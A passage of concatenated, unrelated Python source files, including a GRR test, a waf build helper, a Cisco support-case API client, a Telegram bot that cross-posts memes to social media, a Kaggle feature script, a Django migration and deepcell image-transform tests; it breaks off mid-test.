urn, _ = fs(None, token=self.token).CheckHashes(hashes).next() filestore_fd = aff4.FACTORY.Open(urn, token=self.token) # This is a VFSBlobImage too. self.assertIsInstance(filestore_fd, aff4_grr.VFSBlobImage) # No STAT object attached. self.assertFalse(filestore_fd.Get(filestore_fd.Schema.STAT)) def testRekallProfiles(self): req = requests.get(self.base_url + "rekall_profiles") self.assertEqual(req.status_code, 500) req = requests.get(self.base_url + "rekall_profiles/v1.0") self.assertEqual(req.status_code, 500) known_profile = "F8E2A8B5C9B74BF4A6E4A48F180099942" unknown_profile = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" req = requests.get(self.base_url + "rekall_profiles/v1.0/nt/GUID/" + unknown_profile) self.assertEqual(req.status_code, 404) req = requests.get(self.base_url + "rekall_profiles/v1.0/nt/GUID/" + known_profile) self.assertEqual(req.status_code, 200) pb = rdf_rekall_types.RekallProfile.protobuf() json_format.Parse(req.content.lstrip(")]}'\n"), pb) profile = rdf_rekall_types.RekallProfile.FromSerializedString( pb.SerializeToString()) self.assertEqual(profile.name, "nt/GUID/F8E2A8B5C9B74BF4A6E4A48F180099942") self.assertEqual(profile.version, "v1.0") self.assertEqual(profile.data[:2], "\x1f\x8b") def main(args): test_lib.main(args) if __name__ == "__main__": flags.StartMain(main) <reponame>Vladec/matching-engine import os import glob import subprocess """ """ def get_top_level(bld): ''' Get the relative path from the caller wscript to main wscript. ''' import traceback, os stack = traceback.extract_stack(limit=2) caller = os.path.dirname(stack[0][0]) root = bld.srcnode.abspath() root_to_caller = caller[len(root):].strip(os.path.sep) caller_to_root = '' for entry in root_to_caller.split(os.path.sep): caller_to_root += '..' + os.path.sep caller_to_root = caller_to_root.rstrip(os.path.sep) return caller_to_root def get_module_include_dirs(Context,ModuleName): search_path = "%s%sinclude"%(ModuleName,os.sep) top_level = get_top_level(Context) list = [ os.path.join(search_path,f) for f in os.listdir(search_path) if os.path.isdir(os.path.join(search_path,f))] list.append(search_path) list = [ os.path.join(top_level,f) for f in list] return list """ Unittest related stuff Contain functions to build and run unit tests """ def build_tests(Context, deps, include_paths): saved_dir = os.getcwd() os.chdir( Context.path.relpath() ) source_files = glob.glob("tests/src/*.cpp") for src in source_files: target = "bin"+os.sep+ os.path.basename( os.path.splitext(src)[0] ) res = Context.program ( source=src, target= target, use=deps, includes=include_paths ) for File in glob.glob("tests/config/*.ini"): Context(rule='cp ${SRC} ${TGT}', source=File, target='bin/%s'%os.path.basename(File) ) Context(rule='cp ${SRC} ${TGT}', source="tests/config/pom.xml", target='pom.xml' ) os.chdir( saved_dir ) def run_tests(Context): bin_dir = Context.out_dir + os.sep + Context.path.relpath() + os.sep + 'bin' if not os.path.isdir(bin_dir): # Directory doesn't exist. 
return saved_dir = os.getcwd() os.chdir( bin_dir ) unit_tests = glob.glob("test_*") for test in unit_tests: JUNIT_RESULT = "xunit-%s-report.xml"% (test) VALGRIND_RESULT = "valgrind-%s-report.xml"% (test) Cmd = ["valgrind", "--xml=yes", '--xml-file=%s'%VALGRIND_RESULT, './%s'% test, '--gtest_output=xml:%s' %JUNIT_RESULT ] subprocess.Popen(Cmd).communicate() os.chdir( saved_dir ) <filename>src/ciscosupportsdk/api/case.py from typing import Iterable from ciscosupportsdk.apisession import ApiSession from ciscosupportsdk.models.case import ( Case, CaseDetail, CaseDetailResponse, CaseResponse, CaseStatusFlag, CaseSummaryResponse, SortCaseBy, ) from ciscosupportsdk.validate import CheckSize SERVICE_BASE_URL = "/case/v3/cases" class CaseApi(object): """ The Cisco Support Case API v3 provides a powerful, convenient, and simple way to interact with the Cisco Support Case Manager tool and aims to improve the partner and customer experience by enabling you to access case information instantly, programmatically, and in bulk. """ def __init__(self, session: ApiSession) -> None: self._session = session @CheckSize("case_ids", 30) def get_case_summary( self, case_ids: list[str], sort_by: SortCaseBy = SortCaseBy.UPDATED_DATE, ) -> Iterable[Case]: """ Returns brief information for the specified case or cases. :param: case_ids: list[str]: Identifier of the case or cases for which to return results. Multiple values must be specified within a comma-separated list and cannot exceed 30 IDs. :param: sort_by: SortCaseBy: Order in which the results should be sorted. """ path = f"{SERVICE_BASE_URL}/case_ids/" f"{','.join(case_ids)}" params = {"sort_by": sort_by} yield from self._session.enumerate_results( CaseSummaryResponse, path, query_params=params ) def get_case_details(self, case_id: str) -> CaseDetail: """ Returns detailed information for the specified case. :param: case_id: str: Identifier of the case for which to return results. """ path = f"{SERVICE_BASE_URL}/details/case_id/{case_id}" return self._session.get_result(CaseDetailResponse, path) @CheckSize("contract_ids", 10) def get_cases_by_contract_id( self, contract_ids: list[str], date_created_from: str = None, date_created_to: str = None, status_flag: CaseStatusFlag = CaseStatusFlag.OPEN, ) -> Iterable[Case]: """ Returns summary information for cases associated with the specified contract or contracts. :param: contract_ids: list[str]: Identifier of the user or users for which to return results. A maximum of 10 may be passed. :param: date_created_from: str: Beginning date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: date_created_to: str: End date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: status_flag: CaseStatusFlag: Return only cases associated with the specified status. 
""" path = ( f"{SERVICE_BASE_URL}/contracts/contract_ids/" f"{','.join(contract_ids)}" ) params = { "date_created_from": date_created_from, "date_created_to": date_created_to, "status_flag": status_flag, } yield from self._session.enumerate_results( CaseResponse, path, query_params=params ) @CheckSize("user_ids", 10) def get_cases_by_user_id( self, user_ids: list[str], date_created_from: str = None, date_created_to: str = None, status_flag: CaseStatusFlag = CaseStatusFlag.OPEN, ) -> Iterable[Case]: """ Returns summary information for cases associated with the specified contract or contracts. :param: user_ids: list[str]: Identifier of the user or users for which to return results. A maximum of 10 may be passed. :param: date_created_from: str: Beginning date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: date_created_to: str: End date (in UTC) of the range in which to search. For example: 2013-04-23T11:00:14Z Note: The maximum date range currently supported is 90 days. :param: status_flag: CaseStatusFlag: Return only cases associated with the specified status. """ path = f"{SERVICE_BASE_URL}/users/user_ids/" f"{','.join(user_ids)}" params = { "date_created_from": date_created_from, "date_created_to": date_created_to, "status_flag": status_flag, } yield from self._session.enumerate_results( CaseResponse, path, query_params=params ) from django.apps import AppConfig import session_csrf class BaseAppConfig(AppConfig): name = '{{ cookiecutter.project_name }}.base' def ready(self): # The app is now ready. Include any monkey patches here. # Monkey patch CSRF to switch to session based CSRF. Session # based CSRF will prevent attacks from apps under the same # domain. If you're planning to host your app under it's own # domain you can remove session_csrf and use Django's CSRF # library. 
See also # https://github.com/mozilla/sugardough/issues/38 session_csrf.monkeypatch() <reponame>vinaynpp/onepostbot<filename>onepostbot.py import logging from telegram import Update from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext import facebook import tweepy import json import requests # OPENING CREDENTIALS FILE FOR THE DATA REQUIRED with open('credentials.json', 'r') as cd: cdjson = json.load(cd) # Enable logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO ) logger = logging.getLogger(__name__) bstatus = 1 def fb(image, caption): # INITIALIZING PAGE ACCESS TOKEN graph = facebook.GraphAPI(cdjson["facebook_page_access_token"]) bstatus = 2 # PUBLISHING THE IMAGE WITH CAPTION ON TO THE FACEBOOK PAGE graph.put_photo(image=open(image, "rb").read(), caption=caption) bstatus = 3 return bstatus def insta(image, caption): # INITIALIZING IMAGE AND CAPTION OBJECT TO THE FACEBOOK SERVER initurl = "https://graph.facebook.com/" + cdjson[ "instagram_business_id"] + "/media?image_url=" + image + "&caption=" + caption + "&access_token=" + \ cdjson[ "facebook_page_access_token"] creation = requests.request(method="post", url=initurl) creation_id = "" + creation.json()["id"] bstatus = 2 # PUBLISHING THE OBJECT CREATED ON THE FACEBOOK SERVER finalurl = "https://graph.facebook.com/" + cdjson["instagram_business_id"] + "/media_publish?creation_id=" + \ creation_id + "&access_token=" + cdjson[ "facebook_page_access_token"] creation = requests.request(method="post", url=finalurl) bstatus = 3 return bstatus def tweewt(image, caption): auth = tweepy.OAuthHandler(cdjson["twitter_consumer_key"], cdjson["twitter_consumer_secret"]) auth.set_access_token(cdjson["twitter_access_token"], cdjson["twitter_access_token_secret"]) api = tweepy.API(auth) # INITIALIZING THE IMAGE ON THE SERVER media = api.media_upload(image) bstatus = 2 # PUBLISHING THE CHANGES ON THE FINAL SERVER post_result = api.update_status(status=caption, media_ids=[media.media_id]) bstatus = 3 return bstatus def botcon(image, caption): urlgenerator = 'http://vyd2999.pythonanywhere.com/' with open(image, 'rb') as f: r = requests.post(urlgenerator, files={'image': f}) imageurl = r.json()["url"] fb(image=image, caption=caption) mbstatus = 2 insta(image=imageurl, caption=caption) mbstatus = 3 tweewt(image=image, caption=caption) mbstatus = 5 return mbstatus def start(update: Update, context: CallbackContext) -> None: """Send a message when the command /start is issued.""" update.message.reply_text( 'Hi! KEEP SENDING MEMES BUT MAKE SURE YOU HAVE THE RIGHT TO SHARE AND IF WE HSHARE ON ' 'OUR SOCIAL HANDLE WE ARE NOT RESPONSIBLE FOR ANY COPYRIGHT INFRINGEMENTS... 
' 'SO ONLY SHARE MEMES YOU OWN AND DO NOT MIND US POSTING THEN KEEP SENDING') def help_command(update: Update, context: CallbackContext) -> None: """Send a message when the command /help is issued.""" update.message.reply_text('Help!') def echotext(update: Update, context: CallbackContext) -> None: """Echo the user message.""" update.message.reply_text("Sirf caption leke kya karu me pic bhejna yaar") def echonikal(update: Update, context: CallbackContext) -> None: """Echo the user message.""" update.message.reply_text("jisne ye bot banaya vohi meme bhejega tu pehli fursat me nikal") def echoimage(update: Update, context: CallbackContext) -> None: """Echo the user message.""" update.message.reply_text("Abey bina caption ke post kardu isko me?") def photo(update: Update, context: CallbackContext): user = update.message.from_user photo_file = update.message.photo[-1].get_file() caption_text = update.message.caption filename = "temp/" + str(photo_file.file_id) + ".jpg" photo_file.download(filename) botcon(image=filename, caption=caption_text) update.message.reply_text('NOICE MEME KEEP SENDING...') print(user.username + " sent " + photo_file.file_id) def andar(): """Start the bot.""" print("telegram bot working") # Create the Updater and pass it your bot's token. updater = Updater(cdjson["telegram_token"]) # Get the dispatcher to register handlers dispatcher = updater.dispatcher # on different commands - answer in Telegram dispatcher.add_handler(CommandHandler("start", start)) dispatcher.add_handler(CommandHandler("help", help_command)) # on noncommand i.e message - echo the message on Telegram dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username1"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username1"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username1"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username2"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username2"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username2"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler( MessageHandler((Filters.chat(username=cdjson["telegram_username3"])) & Filters.text & ~Filters.command, echotext)) dispatcher.add_handler(MessageHandler( Filters.chat(username=cdjson["telegram_username3"]) & Filters.photo & Filters.caption & ~Filters.command, photo)) dispatcher.add_handler( MessageHandler(Filters.chat(username=cdjson["telegram_username3"]) & Filters.photo & ~Filters.command, echoimage)) dispatcher.add_handler(MessageHandler(~Filters.command, echonikal)) # Start the Bot updater.start_polling() # Run the bot until you press Ctrl-C or the process receives SIGINT, # SIGTERM or SIGABRT. 
This should be used most of the time, since # start_polling() is non-blocking and will stop the bot gracefully. updater.idle() if __name__ == '__main__': andar() botcon(image="https://drive.google.com/thumbnail?id=1PMrBo42GXpToOfdkrbTVgIz9MyqRGOiA", caption="hello world") #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Jul 10 10:57:48 2018 @author: Kazuki 支払う間隔 """ import numpy as np import pandas as pd import gc import os from multiprocessing import Pool #NTHREAD = cpu_count() #import utils_agg import utils utils.start(__file__) #============================================================================== PREF = 'f306_' KEY = 'SK_ID_PREV' day_start = -365*10 # min: -2922 day_end = -365*0 # min: -2922 os.system(f'rm ../feature_prev/t*_{PREF}*') # ============================================================================= # # ============================================================================= train = utils.read_pickles('../data/prev_train', [KEY]) test = utils.read_pickles('../data/prev_test', [KEY]) prev = utils.read_pickles('../data/previous_application', ['SK_ID_PREV', 'NAME_CONTRACT_TYPE']) # ============================================================================= # # ============================================================================= def percentile(n): def percentile_(x): return np.percentile(x, n) percentile_.__name__ = 'percentile_%s' % n return percentile_ def aggregate(args): path, cont_type, pref = args df = utils.read_pickles(path, [KEY, 'DAYS_ENTRY_PAYMENT']) df = df[df['DAYS_ENTRY_PAYMENT'].between(day_start, day_end)].sort_values([KEY, 'DAYS_ENTRY_PAYMENT']) df = pd.merge(df, prev, on=KEY, how='left'); gc.collect() if cont_type=='NA': df = df[df['NAME_CONTRACT_TYPE'].isnull()] else: df = df[df['NAME_CONTRACT_TYPE']==cont_type] df['DEP_diff'] = df.groupby(KEY).DAYS_ENTRY_PAYMENT.diff() feature = df.groupby(KEY).agg({'DEP_diff': ['min', 'mean', 'max', 'var', 'nunique']}) feature.columns = pd.Index([e[0] + "_" + e[1] for e in feature.columns.tolist()]) feature.reset_index(inplace=True) utils.remove_feature(feature, var_limit=0, sample_size=19999) tmp = pd.merge(train, feature, on=KEY, how='left').drop(KEY, axis=1) utils.to_feature(tmp.add_prefix(PREF+pref), '../feature_prev/train') tmp = pd.merge(test, feature, on=KEY, how='left').drop(KEY, axis=1) utils.to_feature(tmp.add_prefix(PREF+pref), '../feature_prev/test') return # ============================================================================= # main # ============================================================================= paths = [('../data/installments_payments', ''), ('../data/installments_payments_delay', 'delay_'), ('../data/installments_payments', 'notdelay_')] cont_types = [('Consumer loans', 'cons_'), ('Cash loans', 'cas_'), ('Revolving loans', 'rev_'), ('NA', 'nan_')] argss = [] for p in paths: for c in cont_types: print(p, c) path, pref1 = p cont_type, pref2 = c argss.append( [path, cont_type, pref1+pref2] ) pool = Pool(len(argss)) pool.map(aggregate, argss) pool.close() #============================================================================== utils.end(__file__) # Generated by Django 2.1.3 on 2018-12-04 06:39 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Article', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('article', models.TextField()), 
('summary', models.TextField()), ('topic', models.IntegerField(blank=True, null=True)), ('url', models.CharField(max_length=256, unique=True)), ('title', models.CharField(blank=True, max_length=50)), ], options={ 'verbose_name': 'Article', 'verbose_name_plural': 'Articles', }, ), migrations.CreateModel( name='ArticleTopic', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('topicId', models.IntegerField(blank=True, null=True)), ('probability', models.FloatField(blank=True, null=True)), ], options={ 'verbose_name': 'ArticleTopic', 'verbose_name_plural': 'ArticleTopics', }, ), migrations.CreateModel( name='Link', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('url', models.CharField(max_length=256, unique=True)), ('visited', models.BooleanField(default=False)), ('article_fetched', models.BooleanField(default=False)), ], options={ 'verbose_name': 'Link', 'verbose_name_plural': 'Links', }, ), migrations.CreateModel( name='Topic', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('topic', models.IntegerField()), ('keyword', models.CharField(blank=True, max_length=50)), ('probability', models.FloatField(blank=True, null=True)), ], options={ 'verbose_name': 'Topic', 'verbose_name_plural': 'Topics', }, ), migrations.AddIndex( model_name='link', index=models.Index(fields=['url', 'visited'], name='crawler_lin_url_29a44c_idx'), ), migrations.AddIndex( model_name='link', index=models.Index(fields=['visited'], name='visited_idx'), ), migrations.AddField( model_name='articletopic', name='articleId', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='crawler.Article'), ), ] import matplotlib.patches as patches import matplotlib.pyplot as plt import numpy as np # TILING def get_tiles_positions(W, H, w, h, step_x=None, step_y=None): # if steps are not given, just the tile size step_x = step_x or w step_y = step_y or h used_w = ((W - w) // step_x + 1) * step_x used_h = ((H - h) // step_y + 1) * step_y return [(x, y) for x in range(0, used_w, step_x) for y in range(0, used_h, step_y)] def get_image_tiles(img: np.ndarray, w, h, step_x=None, step_y=None): """ Splits the given image in tiles of the specified weight and height; optionally giving a step for sliding tiles. It drops the remaining parts of the image that could not fit in a tile. It returns a list of "images" (numpy arrays). 
""" # make sure it's a numpy array -- it will fail if not possible im_h, im_w = img.shape[0], img.shape[1] pos = get_tiles_positions(im_w, im_h, w, h, step_x, step_y) tiles = [img[y:y + h, x:x + w] for (x, y) in pos] return tiles, pos def draw_tile_box(ax, pos, size, color='r', with_marker=False): rect = patches.Rectangle(pos, size, size, linewidth=1, edgecolor=color, facecolor='none') ax.add_patch(rect) if with_marker: marker = patches.Rectangle(pos, 10, 10, linewidth=1, edgecolor=color, facecolor=color) ax.add_patch(marker) def show_image_with_tiles(img: np.ndarray, tile_size: int, tile_pos: list) -> None: print('Image size: %s, total tiles: %d' % (img.shape, len(tile_pos))) fig, ax = plt.subplots(1, 1, figsize=(15, 8)) ax.axis('off') # show the image itself ax.imshow(img) for pos in tile_pos: draw_tile_box(ax, pos, tile_size) draw_tile_box(ax, (0, 0), tile_size, color='b') # coding=utf-8 from LxPreset import prsMethods # none = '' # def getAutoLoadMayaPlugs(): lis = [] # Common Plugs commonPlugLis = prsMethods.Project.mayaCommonPlugLoadNames() lis.extend(commonPlugLis) # Custom Plugs customPlugLis = prsMethods.Project.mayaCustomPlugLoadNames() if customPlugLis: lis.extend(customPlugLis) return lis <reponame>perilib/perilib-python-robotis-dynamixel2 import struct import perilib from .RobotisDynamixel2Protocol import * class RobotisDynamixel2ParserGenerator(perilib.StreamParserGenerator): def __init__(self, protocol_class=RobotisDynamixel2Protocol, stream=None): super().__init__(protocol_class, stream) self.last_instruction = None def _on_tx_packet(self, packet): # store instruction byte for reference self.last_instruction = packet.buffer[7] super()._on_tx_packet(packet) <reponame>jizhouh/deepcell-tf<gh_stars>100-1000 # Copyright 2016-2021 The <NAME> at the California Institute of # Technology (Caltech), with support from the Paul Allen Family Foundation, # Google, & National Institutes of Health (NIH) under Grant U24CA224309-01. # All rights reserved. # # Licensed under a modified Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.github.com/vanvalenlab/deepcell-tf/LICENSE # # The Work provided may be used for non-commercial academic purposes only. # For any other use of the Work, including commercial use, please contact: # <EMAIL> # # Neither the name of Caltech nor the names of its contributors may be used # to endorse or promote products derived from this software without specific # prior written permission. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# ============================================================================== """Tests for transform_utils""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from skimage.measure import label from tensorflow.python.platform import test from tensorflow.keras import backend as K from deepcell.utils import transform_utils def _get_image(img_h=300, img_w=300): bias = np.random.rand(img_w, img_h) * 64 variance = np.random.rand(img_w, img_h) * (255 - 64) img = np.random.rand(img_w, img_h) * variance + bias return img def _generate_test_masks(): img_w = img_h = 30 mask_images = [] for _ in range(8): imarray = np.random.randint(2, size=(img_w, img_h, 1)) mask_images.append(imarray) return mask_images class TransformUtilsTest(test.TestCase): def test_pixelwise_transform_2d(self): with self.cached_session(): K.set_image_data_format('channels_last') # test single edge class for img in _generate_test_masks(): img = label(img) img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=False) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=1, data_format='channels_last', separate_edge_classes=False) self.assertEqual(pw_img.shape[-1], 3) self.assertEqual(pw_img_dil.shape[-1], 3) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) # test separate edge classes for img in _generate_test_masks(): img = label(img) img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=True) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=1, data_format='channels_last', separate_edge_classes=True) self.assertEqual(pw_img.shape[-1], 4) self.assertEqual(pw_img_dil.shape[-1], 4) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] + pw_img[..., 2], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) def test_pixelwise_transform_3d(self): frames = 10 img_list = [] for img in _generate_test_masks(): frame_list = [] for _ in range(frames): frame_list.append(label(img)) img_stack = np.array(frame_list) img_list.append(img_stack) with self.cached_session(): K.set_image_data_format('channels_last') # test single edge class maskstack = np.vstack(img_list) batch_count = maskstack.shape[0] // frames new_shape = tuple([batch_count, frames] + list(maskstack.shape[1:])) maskstack = np.reshape(maskstack, new_shape) for i in range(maskstack.shape[0]): img = maskstack[i, ...] img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=False) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=2, data_format='channels_last', separate_edge_classes=False) self.assertEqual(pw_img.shape[-1], 3) self.assertEqual(pw_img_dil.shape[-1], 3) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) # test separate edge classes maskstack = np.vstack(img_list) batch_count = maskstack.shape[0] // frames new_shape = tuple([batch_count, frames] + list(maskstack.shape[1:])) maskstack = np.reshape(maskstack, new_shape) for i in range(maskstack.shape[0]): img = maskstack[i, ...] 
img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=True) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=2, data_format='channels_last', separate_edge_classes=True) self.assertEqual(pw_img.shape[-1], 4) self.assertEqual(pw_img_dil.shape[-1], 4) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] + pw_img[..., 2], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) def test_outer_distance_transform_2d(self): for img in _generate_test_masks(): K.set_image_data_format('channels_last') bins = None distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 3 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 4 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) K.set_image_data_format('channels_first') img = np.rollaxis(img, -1, 1) bins = None distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 3 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 4 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) def test_outer_distance_transform_3d(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) def test_outer_distance_transform_movie(self): mask_stack = np.array(_generate_test_masks()) 
unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) def test_inner_distance_transform_2d(self): for img in _generate_test_masks(): K.set_image_data_format('channels_last') bins = None distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 3 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 4 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) K.set_image_data_format('channels_first') img = np.rollaxis(img, -1, 1) bins = None distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 3 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 4 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) def test_inner_distance_transform_3d(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = 
